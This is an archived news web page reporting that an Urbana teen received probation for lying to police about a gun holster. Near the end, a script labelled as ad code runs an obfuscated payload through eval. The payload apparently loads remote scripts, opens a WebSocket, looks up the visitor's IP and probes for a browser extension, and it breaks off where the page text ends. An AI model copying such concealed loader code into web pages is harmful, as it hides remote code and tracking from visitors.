<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <!-- Optimized mobile viewport -->
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Place favicon.ico and apple-touch-icon.png in root directory -->
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<link rel="shortcut icon" href="http://www.news-gazette.com/sites/all/files/favicon.ico" type="image/x-icon" />
<meta name="keywords" content="Champaign,Urbana,Danville,Paxton,Rantoul,Mahomet,Monticello,Tuscola,East Central Illinois,University of Illinois at Urbana-Champaign,News" />
<meta name="copyright" content="Copyright (c) 2015 The News-Gazette, Inc." />
<meta name="description" content="URBANA — An Urbana teen whose lie to police sent them on a wild goose chase for a gun holster has been sentenced to a year of probation.Kyron Z." />
    <title>Probation for fibbing Urbana teen | News-Gazette.com</title>
    <link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/modules/custom/custom_node/custom_node.css?B" />
<link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/modules/custom/news/news.css?B" />
<link type="text/css" rel="stylesheet" media="all" href="http://static.news-gazette.com/sites/all/files/css/css_a9429203c03d4d2321182f8a18a44f1e.css" />
<link type="text/css" rel="stylesheet" media="print" href="http://static.news-gazette.com/sites/all/files/css/css_b9520231d4fd37d957f51e16c8e72236.css" />
<!--[if lte IE 7]>
        <link type="text/css" rel="stylesheet" href="/sites/all/modules/custom/ng_weather/css/weather_ie7.css" media="all" />
      <![endif]-->    <script type="text/javascript" src="http://static.news-gazette.com/sites/all/files/js/js_e859c7a554c03418407f96e4cab950e5.js"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
jQuery.extend(Drupal.settings, {"basePath":"\/","googleanalytics":{"trackOutgoing":1,"trackMailto":1,"trackDownload":1,"trackDownloadExtensions":"7z|aac|arc|arj|asf|asx|avi|bin|csv|doc|exe|flv|gif|gz|gzip|hqx|jar|jpe?g|js|mp(2|3|4|e?g)|mov(ie)?|msi|msp|pdf|phps|png|ppt|qtm?|ra(m|r)?|sea|sit|tar|tgz|torrent|txt|wav|wma|wmv|wpd|xls|xml|z|zip"},"uc_ajax_cart":{"CALLBACK":"\/uc_ajax_cart\/add\/item","SHOW_CALLBACK":"\/uc_ajax_cart\/show","CART_LINK_CALLBACK":"\/uc_ajax_cart\/addlink","BLOCK_UI":2,"TIMEOUT":2500,"UPDATE_CALLBACK":"\/uc_ajax_cart\/update","UPDATE":0,"CART_VIEW_ON":0,"SHOW_VIEW_CALLBACK":"\/uc_ajax_cart\/show-cart-view","TRACK_CLOSED_STATE":0,"INITIAL_CLOSED_STATE":0,"CART_PANE_EFFECT":0,"CART_PANE_EFFECT_DURATION":200,"HIDE_CART_OPERATIONS":false,"COLLAPSIBLE_CART":0,"CART_OPERATION":"Cart","ADD_TITLE":"Please wait","ADD_MESSAGES":["Adding product to cart..."],"REMOVE_TITLE":"Please wait","REMOVE_MESSAGES":["Removing product from cart..."],"UPDATE_TITLE":"Please wait","UPDATE_MESSAGES":["Updating cart..."]},"pc_meter":{"params":{"cn":"_pcmcn","hn":"subscriptions.news-gazette.com","ep":"\/visit","debug":0,"count_only":1,"ur":"\/news\/local\/2016-09-16\/probation-fibbing-urbana-teen.html","force":null,"ni":"1475795","ct":"story","ap":"0","cr":"1474051212","ch":"1474051213","sl":1121,"sec_t":"Local|News","top_t":"","po":0}},"ws_fl":{"width":92,"height":"21"},"ws_gpo":{"type":"medium","counter":true},"jPlayer":{"swfPath":"\/sites\/all\/libraries\/jplayer","autoPlay":0}});
//--><!]]>
</script>
    <script src="/sites/all/themes/custom/ng_fbg/js/jwp/jwplayer.js"></script>
    <script src="/sites/all/themes/custom/ng_fbg/js/jwp/ng-jwp.js"></script>
    <!--[if lt IE 7]>
    <link type="text/css" rel="stylesheet" media="all" href="/sites/all/themes/custom/ng_fbg/fix-ie.css" />            <![endif]-->
        <meta property="og:title" content="Probation for fibbing Urbana teen" />
    <meta property="og:type" content="article" />
    <meta property="og:url" content="http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html" />
    <meta property="og:image" content="http://news-gazette.com/sites/all/themes/custom/ng_fbg/images/social.jpg" />
    <meta property="og:description" content="URBANA — An Urbana teen whose lie to police sent them on a wild goose chase for a gun holster has been sentenced to a year of probation.
K"/>
</head>

<body>

<!--Begin google consumer surveys -->
    <script type="text/javascript">
        (function() {
            var ARTICLE_URL = window.location.href;
            var CONTENT_ID = 'everything';
            document.write(
                '<scr'+'ipt '+
                'src="//survey.g.doubleclick.net/survey?site=_5mvdtzorx4zyw'+
                '&amp;url='+encodeURIComponent(ARTICLE_URL)+
                (CONTENT_ID ? '&amp;cid='+encodeURIComponent(CONTENT_ID) : '')+
                '&amp;random='+(new Date).getTime()+
                '" type="text/javascript">'+'\x3C/scr'+'ipt>');
        })();
    </script>
<!-- end google consumer surveys -->

<!-- Page Header -->
		<div id="screenshift"></div>
	<script type="text/javascript">
		if (($.cookie('_pcmss')==null) || $.cookie('_pcmss').substring(0,1)==0)
		{
			runUndertone();
		}
	</script>
<div id="lbAds">
<!--    isset($node) && $node->type == 'story'-->

<!--    -->
<!--    -->
<!--    LB positions -->
            <div id="runOfSite"></div>
    
    <div id="mobileLB"></div>
<!--    strpos('sports/illini-sports/mens-basketball')-->

</div>

<div id="loginContainer"></div>
<div id="displayOverlay"></div>
<div class="header">

	<div class="container topstuff"> <!-- above menu -->

		<div class="nglogo-front"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/news-gazette-full.png" width="260px" /></a> </div>
		<div class="nglogo-back hidden"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/news-gazette-rev-full.png" width="270px" /></a> </div>
		<div class="nglogo-back-small hidden"> <a href="/"><img src="/sites/all/themes/custom/ng_fbg/images/ng-rev-small.png" width="60px" /></a> </div>
		<div class="toplinks">
			<a href="https://subscriptions.news-gazette.com/"><i class="fa fa-newspaper-o" aria-hidden="true"></i> Subscribe</a>

			<a title="login options" data-toggle="modal" href="#myModal"><i class="fa fa-user" aria-hidden="true"></i> Log In</a>
			<a href="#" title="search" onclick="showSearch();"><i class="fa fa-search" aria-hidden="true"></i> Search</a>
			<a href="javascript:void(window.open('http://player.listenlive.co/47651','_blank','width=850,height=600,left=100,top=100,location=no,menubar=no,status=no,toolbar=no,scrollbars=no,resizable=no'));"><i class="fa fa-headphones" aria-hidden="true"></i> Listen Now</a>
		</div><!-- end toplinks -->
		<div class="wdwslogo-front hidden"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-wide-full.png" width="260px" /></a> </div>
		<div class="wdwslogo-back"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-wide-rev-full.png" width="260px" /></a> </div>
		<div class="wdwslogo-back-small"> <a href="/wdws"><img src="/sites/all/themes/custom/ng_fbg/images/wdws-rev-small.png" width="75px" /></a> </div>
	</div>
	<div class="navstripe">
    <div class="container">
        <p class="datebox ngdatebox">Friday, September 16, 2016 <a href="/weather"><strong><span id="current-temp-replace">83</span></strong></a>
        <a href="http://eedition.news-gazette.com">Today's Paper</a></p>
        <div id="weather-info" class="hidden"><div id="block-ng_weather-weather" class="clear-block block block-ng_weather ">


  <div class="content"><div id="weather-container">
      <a href="/weather">

      <div class="row day">
        <div class="location-forecast small current forecast-img bk wcr ">
        </div>
        <div class="weather-info">
          <h2 class="location">Weather</h2>
          <div class="current-temp">
            71<span class="degrees">&deg;F</span>
          </div>
          <div class="forecast">Mostly Cloudy with Light Rain</div>
        </div> 
      </div>
    </a>
  </div>
</div>
</div>
</div>
        <p class="datebox wdwsdatebox hidden"><span class="wdws-date">Friday, September 16, 2016  &#160;&#160;</span><a href="">Today's Schedule</a> &#160;&#160;<a href="">Listen Now!</a></p>

        <nav id="anchored" class="navbar navbar-default newsnav" role="navigation">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
            </div>
            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse navbar-ex1-collapse">
                <ul class="nav navbar-nav stretch">
                    <li class="dropdown"><a title="News" href="/news" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">News <b class="caret"></b></a>
                        <ul role="menu" class="dropdown-menu">
                            <li><a title="Local News" href="/news/local">Local</a></li>
                            <li><a title="State News" href="/news/state">State</a></li>
                            <li><a title="National and World News" href="/news/nationworld">Nation - World</a></li>
                            <li><a title="Business News" href="/news/business">Business</a></li>
                            <li><a title="Obituaries" href="/obituaries">Obituaries</a></li>
                            <li><a title="Weather" href="/news/weather">Weather</a></li>
                        </ul>
                    </li>
                    <li class="dropdown"><a title="Sports" href="/sports" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Sports <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Prep Sports" href="/sports/prep-sports">Prep Sports</a></li>
                            <li><a title="Illini Sports" href="/sports/illini-sports">Illini Sports</a></li>
                            <li><a title="All Sports" href="/sports">All Sports</a></li>
                            <li><a title="Illini Forums" href="http://forums.illinihq.com">Illini Forums</a></li>
                        </ul>
                    </li>
                    <li><a title="Business" href="/news/business">Business</a></li>
                    <li><a title="Living" href="/living">Living</a></li>
                    <li><a title="Arts and Entertainment" href="/arts-entertainment">A&E</a></li>
                    <li><a title="Blogs" href="/blogs">Blogs</a></li>
                    <li class="dropdown"><a title="Opinion" href="/opinion" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Opinion <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Editorials" href="/opinion/editorials">Editorials</a></li>
                            <li><a title="Letters to the Editor" href="/opinion/letters-editor">Letters</a></li>
                            <li><a title="Columns" href="/opinion/columns">Columns</a></li>
                            <li><a title="Guest Commentary" href="/opinion/guest-commentary">Guest Commentary</a></li>
                            <li><a title="All Opinions" href="/opinion/">All Opinions</a></li>
                        </ul>
                    </li>
                    <li class="dropdown"><a title="Multimedia" href="/multimedia" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Multimedia <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Photo Galleries" href="/multimedia/photogallery">Photo Galleries</a></li>
                            <li><a title="Podcasts" href="/multimedia/podcast">Podcasts</a></li>
                            <li><a title="Videos" href="/video">Videos</a></li>
                        </ul>
                    </li>
                    <li class="dropdown secondary-menu-item"><a title="Classified" href="/classified" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Classified <span class="caret"></span></a>
                        <ul role="menu" class=" dropdown-menu">
                            <li><a title="Classified Jobs" href="https://classadz.vdata.com/Champaign/Advertising/AdvertiserType.aspx">Place an Ad</a></li>
                            <li><a title="News-Gazette Classifieds" href="/classified">Classified Listings</a></li>
                            <li><a title="Garage Sales" href="/classified/garage-sales">Garage Sales</a></li>
                            <li><a title="Classified Jobs" href="http://careers.news-gazette.com">Jobs</a></li>
                        </ul>
                    </li>
                    <li class="secondary-menu-item"><a title="Store" href="http://news-gazette.jobs">Jobs</a></li>
                    <li class="secondary-menu-item"><a title="Store" href="/store/deal-day">Shop</a></li>
                    <li class="secondary-menu-item"><a title="Weekly Ads" href="/circulars">Weekly Ads</a></li>
                </ul>
            </div>
        </nav>
    </div> <!-- end container with navigation -->
</div> <!-- end navstripe -->

</div> <!-- end header -->

<div class="secondary-header">
    <div class="container">
        <div class="secondary-menu">
            <ul class="nav navbar-nav stretch secondary-nav">
                <li class="dropdown"><a title="Classified" href="/classified" data-toggle="dropdown" class="dropdown-toggle" aria-haspopup="true">Classified <span class="caret"></span></a>
                    <ul role="menu" class=" dropdown-menu">
                        <li><a title="Classified Jobs" href="https://classadz.vdata.com/Champaign/Advertising/AdvertiserType.aspx">Place an Ad</a></li>
                        <li><a title="News-Gazette Classifieds" href="/classified">Classified Listings</a></li>
                        <li><a title="Garage Sales" href="/classified/garage-sales">Garage Sales</a></li>
                        <li><a title="Classified Jobs" href="http://careers.news-gazette.com">Jobs</a></li>
                    </ul>
                </li>
                <li><a title="NewsGazette.jobs" href="http://news-gazette.jobs">Jobs</a></li>
                <li><a title="Store" href="/store/deal-day">Shop</a></li>
                <li><a title="Weekly Ads" href="/circulars">Weekly Ads</a></li>
            </ul>
        </div> <!-- end secondary menu -->

        
        <div class="trending-news-background">
        </div> <!-- end breaking-news-background trending-news-background -->

    </div> <!-- end container -->
    <div class="right-of-secondary-menu"></div>
</div> <!-- end secondary-header -->
<div id="nodeType" data-type="story"></div>

<div class="navbar-inverse"></div>
<div id="adLib" class="remove">
    <div class="container">
        <div class="col-md-12 scrollTab">

            <a href="/"><img class="scrollLogo " src="/sites/all/themes/custom/ng_fbg/images/ng_small.png"></a><a href="/wdws"><img class="scrollLogo " src="/sites/all/themes/custom/ng_fbg/images/wdws_small.png"></a>
                            <span class="scrollTitle">Probation for fibbing Urbana teen   <span id="share" class="glyphicon glyphicon-share" onclick="shareIt()"><span class="share-txt">share</span></span></span>
                <div class="scrollSocial" style="display:none;">
                    <a title="Facebook share button" class="facebook" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank">Facebook</a>
                    <a title="Twitter share button" class="twitter" href="https://twitter.com/share?url=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html&amp;text=Probation for fibbing Urbana teen" onclick="return !window.open(this.href, 'Twitter', 'width=640,height=200')" target="_blank">Twitter</a>
                </div>
                        <div class="scrollLogin pull-right">
                <span class="wdwsCurrent"><a title="weather" href="/weather"><span class="glyphicon glyphicon-cloud icon-bar"></span></a><span title="search" class="glyphicon glyphicon-search icon-bar" onclick="showSearchScroll();"></span> <a title="login options" data-toggle="modal" href="#myModal"><span class="glyphicon glyphicon-user icon-bar"></span></a> | <a title="subscribe to the news-gazette" href="http://members.news-gazette.com">Subscribe</a></span>
            </div>
        </div>
        <progress value="0"></progress>

        <div id="menuAnchor"></div>
    </div>

    
        <div id="addRelated">
            <div class="container">
                <div class="col-md-12">
                    <h2>More Local</h2>
                    <ul id="scrollList">
                                                    <li>
                                                                <a href="/news/local/2016-09-16/probation-fibbing-urbana-teen.html">Probation for fibbing Urbana teen</a>                            </li>
                                                    <li>
                                                                <a href="/news/local/2016-09-16/6-years-man-who-stashed-cocaine-under-hood-car.html">6 years for man who stashed cocaine under hood of car</a>                            </li>
                                                    <li>
                                                                    <a href="/news/local/2016-09-16/ill-take-lesson-learned.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/09/16/0917_loca_Donovan_Hill_copy.jpg" alt="&#039;I&#039;ll take this as a lesson learned&#039;" title="&#039;I&#039;ll take this as a lesson learned&#039;"  class="imagecache imagecache-100x100_scale" width="100" height="63" /></a>                                                                <a href="/news/local/2016-09-16/ill-take-lesson-learned.html">&#039;I&#039;ll take this as a lesson learned&#039;</a>                            </li>
                                                    <li>
                                                                <a href="/news/local/2016-09-16/monticello-gets-eight-figure-loan-water-plant-work.html">Monticello gets eight figure loan for water plant work</a>                            </li>
                                            </ul>
                </div></div>
        </div>

    

</div>

<div class="container col-md-12">
    <!-- Modal -->
    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header">
                    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
                    <h4 class="modal-title">Login Options</h4>
                </div>
                <div class="modal-body">
                        <div id="commenting" class="col-md-6 commentingLogin">
                            <h2>Commenting</h2>
                            <p>Login to comment or to shop for deal of the day or books.</p>
                        </div>
                        <div id="member" class="col-md-6 memberLogin">
                            <h2>Member Login</h2>
                            <p><a href="#">Login</a> to your member account to read premium articles.</p>
                        </div>

                    <div id="loginHid" style="display:none;">
                        <form action="/news/local/2016-09-16/probation-fibbing-urbana-teen.html?destination=node%2F1475795"  accept-charset="UTF-8" method="post" id="user-login-form">
<div><div class="form-item" id="edit-name-wrapper">
 <label for="edit-name">Username or e-mail: <span class="form-required" title="This field is required.">*</span></label>
 <input type="text" maxlength="60" name="name" id="edit-name" size="15" value="" class="form-text required" />
</div>
<div class="form-item" id="edit-pass-wrapper">
 <label for="edit-pass">Password: <span class="form-required" title="This field is required.">*</span></label>
 <input type="password" name="pass" id="edit-pass"  maxlength="60"  size="15"  class="form-text required" />
</div>
<input type="submit" name="op" id="edit-submit-1" value="Log in"  class="form-submit" />
<div class="item-list"><ul><li class="first"><a href="/user/register" title="Create a new user account.">Create new account</a></li>
<li class="last"><a href="/user/password" title="Request new password via e-mail.">Request new password</a></li>
</ul></div><input type="hidden" name="form_build_id" id="form-cfb463e18d293d826e801c39c6c053c4" value="form-cfb463e18d293d826e801c39c6c053c4"  />
<input type="hidden" name="form_id" id="edit-user-login-block" value="user_login_block"  />

</div></form>
                    </div>
                </div>
                <div class="modal-footer">
                    <div id="btn-anchor"></div><button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                </div>
            </div><!-- /.modal-content -->
        </div><!-- /.modal-dialog -->
    </div><!-- /.modal -->



</div>

<div class="container">

<div id="searchSolar" class="col-md-12" style="display:none;">
    <div class="control-group">
        <form id="searchIt" action="/search/apachesolr_search/">
            <input type="text" placeholder="Search articles, videos, obituaries" id="search" class="searchLong input-large">
            <input type="submit" value="Search" id="searchNow" class="btn btn-success" alt="Click to search" title="Click to Search">
        </form>
    </div>
</div>  <section id="section-content" class="section section-content col-md-12">
	<div id="page">
      <div id="main">
	    		  <div id="content" class="col-md-8">
			
		    <div id="breadcrumb"><div class="breadcrumb"><a href="/">Home</a> » <a href="/news">News</a> » <a href="/news/local">Local</a></div></div>				              <!--<span class="glyphicon glyphicon-bookmark markit" onclick="bookmark()"></span> -->
			<h1 class="title" id="page-title">Probation for fibbing Urbana teen</h1>                                     
            <div id="content-content" class="clear-block">
                <div class="col-md-12">
              
    <div id="node-1475795" class="node">
        <form id="bookmark">
            <input name="nid" type="hidden" value="1475795">
            <input name="title" type="hidden" value="Probation+for+fibbing+Urbana+teen">
        </form>

        
        
        <span class="submitted"><div class="submitted"><span class="timestamp">Fri, 09/16/2016 - 1:40pm</span> | <span class="authors"><a href="/author/mary-schenk">Mary Schenk</a></span></div></span>

    <div class="p402_premium"><!-- Begin GCS -->
            <div class="content">
                                                            <div class="p402_hide"><!-- Begin hide forGCS -->
                            <div id="social-media-widgets">
                                <div class="social-share">
        <a class="share-btn" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-facebook.png"></a>
    <a class="share-btn" href="https://twitter.com/share?url=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html&amp;text=Probation for fibbing Urbana teen" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-twitter.png"></a>
    <a href="javascript:window.print()"><img src="/sites/all/themes/custom/ng_fbg/images/print.png"></a>
    <a class="share-btn" href="/printmail/1475795"><img src="/sites/all/themes/custom/ng_fbg/images/send4.png"></a>
</div><!--                                -->                            </div>
                        </div>
                                    <p>URBANA — An Urbana teen whose lie to police sent them on a wild goose chase for a gun holster has been sentenced to a year of probation.</p>
<p>Kyron Z. Tappin,18, who last lived in the 2200 block of South Philo Road, was also ordered to perform 30 hours of public service, pay a $500 fine and get a substance abuse evaluation after pleading guilty to obstructing justice.</p>
<p>He admitted to Judge Heidi Ladd that on March 31, he falsely told Urbana police who were looking for a gun that had been fired inside Tappin’s duplex, that he had disposed of the gun’s holster down a manhole.</p>
<p>The gun and ammunition for it were later found in a bag in the backyard of the duplex.</p>
<p>Another charge alleging Tappin had a gun without a firearm owner’s identification charge was dismissed in return for his guilty plea to the felony.</p>
<p>His co-defendant, Paul Berlocher, 18, who is alleged to have fired the gun inside Tappin’s home that penetrated into the neighbor’s side of the duplex, is scheduled to be back in court Oct. 4 on charges of reckless discharge of a gun and unlawful use of weapons.</p>
<div class="clear"></div>                <div class="clear"></div>
            </div>
        </div><!-- End GCS -->
        <!-- Begin conditional GCS script execution -->
                    <script type="text/javascript">
                if (($.cookie('_pcmss')==null) || $.cookie('_pcmss').substring(0,1)==0) {
                    try { _402_Show(); } catch(e) {}
                }
            </script>        <!--  End conditional GCS script execution-->
                    <div id="h-social">
                <div class="social-share">
        <a class="share-btn" href="https://www.facebook.com/sharer/sharer.php?u=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-facebook.png"></a>
    <a class="share-btn" href="https://twitter.com/share?url=http://www.news-gazette.com/news/local/2016-09-16/probation-fibbing-urbana-teen.html&amp;text=Probation for fibbing Urbana teen" onclick="return !window.open(this.href, 'Facebook', 'width=640,height=200')" target="_blank"><img src="/sites/all/themes/custom/ng_fbg/images/32-twitter.png"></a>
    <a href="javascript:window.print()"><img src="/sites/all/themes/custom/ng_fbg/images/print.png"></a>
    <a class="share-btn" href="/printmail/1475795"><img src="/sites/all/themes/custom/ng_fbg/images/send4.png"></a>
</div>            </div>
                <div class="meta">
                            <div id="vocab-1475795-27-wrapper" class="vocab-wrapper"><span class="vocab-label">Sections (2):</span><span class="vocab-terms"><a href="/news">News</a>, <a href="/news/local">Local</a></span></div>                    </div>

            
                <div id="showRelated">
                    <h2>More Local</h2>
                    <a class="btn-dismiss" onclick="dismissShowRelated()" class="btn btn-default btn-next"><span class="glyphicon glyphicon-remove-sign"></span></a>
                    <ul id="showScrollList">
                                                    <li style="display:none;">
                                                                <a href="/news/local/2016-09-16/probation-fibbing-urbana-teen.html">Probation for fibbing Urbana teen</a>                            </li>
                                                    <li style="display:none;">
                                                                <a href="/news/local/2016-09-16/6-years-man-who-stashed-cocaine-under-hood-car.html">6 years for man who stashed cocaine under hood of car</a>                            </li>
                                                    <li style="display:none;">
                                                                    <a href="/news/local/2016-09-16/ill-take-lesson-learned.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/09/16/0917_loca_Donovan_Hill_copy.jpg" alt="&#039;I&#039;ll take this as a lesson learned&#039;" title="&#039;I&#039;ll take this as a lesson learned&#039;"  class="imagecache imagecache-100x100_scale" width="100" height="63" /></a>                                                                <a href="/news/local/2016-09-16/ill-take-lesson-learned.html">&#039;I&#039;ll take this as a lesson learned&#039;</a>                            </li>
                                                    <li style="display:none;">
                                                                <a href="/news/local/2016-09-16/monticello-gets-eight-figure-loan-water-plant-work.html">Monticello gets eight figure loan for water plant work</a>                            </li>
                                            </ul>
                    <a onclick="showNextList()" class="btn-next"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>


                </div>

                <div id="mobileRelated" style="display:none">
                    <h2>More Local</h2>
                    <ul id="mobileList">
                                                    <li>
                                                                <a href="/news/local/2016-09-16/probation-fibbing-urbana-teen.html">Probation for fibbing Urbana teen</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                <a href="/news/local/2016-09-16/6-years-man-who-stashed-cocaine-under-hood-car.html">6 years for man who stashed cocaine under hood of car</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                    <a href="/news/local/2016-09-16/ill-take-lesson-learned.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/09/16/0917_loca_Donovan_Hill_copy.jpg" alt="&#039;I&#039;ll take this as a lesson learned&#039;" title="&#039;I&#039;ll take this as a lesson learned&#039;"  class="imagecache imagecache-100x100_scale" width="100" height="63" /></a>                                                                <a href="/news/local/2016-09-16/ill-take-lesson-learned.html">&#039;I&#039;ll take this as a lesson learned&#039;</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                <a href="/news/local/2016-09-16/monticello-gets-eight-figure-loan-water-plant-work.html">Monticello gets eight figure loan for water plant work</a>                                <div class="clear"></div>
                            </li>
                                            </ul>

                </div>

            				
            <!--                <div id="taboola-below-article-thumbnails"></div>-->
<!--                <script type="text/javascript">-->
<!--                 window._taboola = window._taboola || [];-->
<!--                  _taboola.push({-->
<!--                       mode: 'thumbnails-a',-->
<!--                       container: 'taboola-below-article-thumbnails',-->
<!--                       placement: 'Below Article Thumbnails',-->
<!--                       target_type: 'mix'-->
<!--                   });-->
<!--                   </script>-->
                <script>

                    /*begin JS*/
                    /*JS for showing content ads to users*/
                    var _domain_ ="news-gazette.com";  var clientID = "b99f2a2a-9aa1-fcfe-b5d4-f5562ab2fd63";  eval((function(){var n=[94,86,88,79,87,75,65,80,76,70,66,85,90,74,71,89,82,60,81,72];var d=[];for(var l=0;l<n.length;l++)d[n[l]]=l+1;var c=[];for(var r=0;r<arguments.length;r++){var w=arguments[r].split('~');for(var u=w.length-1;u>=0;u--){var f=null;var j=w[u];var y=null;var s=0;var i=j.length;var h;for(var k=0;k<i;k++){var v=j.charCodeAt(k);var a=d[v];if(a){f=(a-1)*94+j.charCodeAt(k+1)-32;h=k;k++;}else if(v==96){f=94*(n.length-32+j.charCodeAt(k+1))+j.charCodeAt(k+2)-32;h=k;k+=2;}else{continue;}if(y==null)y=[];if(h>s)y.push(j.substring(s,h));y.push(w[f+1]);s=k+1;}if(y!=null){if(s<i)y.push(j.substring(s));w[u]=y.join('');}}c.push(w[0]);}var x=c.join('');var g='abcdefghijklmnopqrstuvwxyz';var q=[126,39,10,42,92,96].concat(n);var m=String.fromCharCode(64);for(var l=0;l<q.length;l++)x=x.split(m+g.charAt(l)).join(String.fromCharCode(q[l]));return x.split(m+'!').join(m);})('^[_$_1825=["^.^ set@mccount^Tr@m-78503326-2","push^%^ setDo^SNam^Lnone^%^ setSample@wat^L1^%^ set@mllow@oinker^R^K","createElement","typ^Ltext/javas^K","async^Rrc^Bs:","protocol","loca^Z^B^Xssl^B://www",".google-^9.com/ga.js","getElements@qyTagNam^Linsert@qefor^LparentNod^L^D","track@w@ls_1_percent: ^D: [","]^%^ setCustom@har^%^ trackEvent^\\ser events","_cre^)S^K^\\pd^)","^Tm@qCDE@p@u@zI@t@l@oMN@j@n@y@wST@r@h@k@i@v@sabcdefghijklmnopqrstuvwxyz0123456789","rando^Ylength","floor","char@mt","ws^X","w^X^\\nified.adsjudo.co^Yj@yuery^B^Xcode.jquery.com/jquery-2.2.0.min.js^Iload^Ireadystatechang^LreadyStat^Lloade^Mcomplet^Lprec^W^Ierror","appendChil^Mhea^Mhref","$type$prec^W^J^J||null^Jgnadj","getIte^Y ^\\ndefined ","index@jf","js_feed^Jfeed^Jc^WI@n$type$^Rend^Iopen^Iclos^Lundefine^M@x^C  src^Ochrome-exten^]://cfhdojbkjhnklbpkdaibdccddilifddb/op^Zs.html@e" style^Odisplay:none@e">@x/^C>","appen^Mbody","loa^M@x^C  src^O^Te" style^Odisplay:none@e">@x/^C>","^C[src@d^O^Te"]^TkebSocket","content@kindow^I","^C[src@d^Ochrome-exten^]://cfhdojbkjhnklbpkdaibdccddilifddb/op^Zs.html@e"]^Imessag^Ldata","getIp","js_fee^Mpars^Lwp^Rettings","bicall","css","fee^M  ^RetIte^Ydata:text/javas^K;charset=utf-8,","top","init"];^N^[^a=^a|| [];^a[_$^!0^<[1]^:$^!3^<[4]^:$^!5^<[6]^:$^!7],^V])^H^._^9^A=(^3^F {_cre^)S^K:^3^N(f^\'a^"9]^*;a^610^+11];a^612^P^V;a^613^P^814]== ^#1^2[15]]?^=17]:^=18])^419^Eb^"20]^*[0];b^622]]^621]](a,b)})()^1},upd^):f^\'c^"23^?d=^=2^bc^425];^a[_$^!26],1,^=23],c,1^:$^!27^<[28],d])}}})()^1;^N^._^9^A^629]]();^._^9^A^630]]()^1^H^S^A=f^\'p^Ho=^71^Eh^Hj=^71^Eg=^V;func^Z m(^GI=^71^E@z=^72];for(^[@u=0;@u@x 5;@u++){I+= @z^636]](Math^635]](Math^63^Q)@d @z^634]]))};^F I}^[l=^814]== ^#1^2[15]]?^77]:^78])^439^Ek=^3if(!window^640]]^Gq^"9]^*;q^610^+11];q^613^+41];q^642^Pq^643^&if(!this^644]^`this^644]]^045^`this^644]]^046]){q^642^Pq^643^Pnull;n^8^^}};q^648^&};^#20^/50])[0]^649]](q)^@n^8^^}}^Hn=^;t^Gr^"1^2[51]];if(t^0^^{o= ^=52]+ ^>^45^Ur^45^b_^D_;i(o)^@h= ses^]Storage^656^/55]);if(h== null|| h^031^`h^057^`h^659^/58])>  -1){o= ^=60]+ ^>^45^Ur^45^b_^D_^@o= ^=61]+ ^>^45^Ur^45^b_^D_^-63^/62]+ o)}}^Hi=^;u){p=  new @kebSocket(l);p^664^&p^66^Qu)^-65^&^-48^&if( typeof error@ks^066]){error@ks= ^V;^$69^5[68^/67]);^$78^5[77^/70],f^\'v=m();^$69^5[68^/71]+ 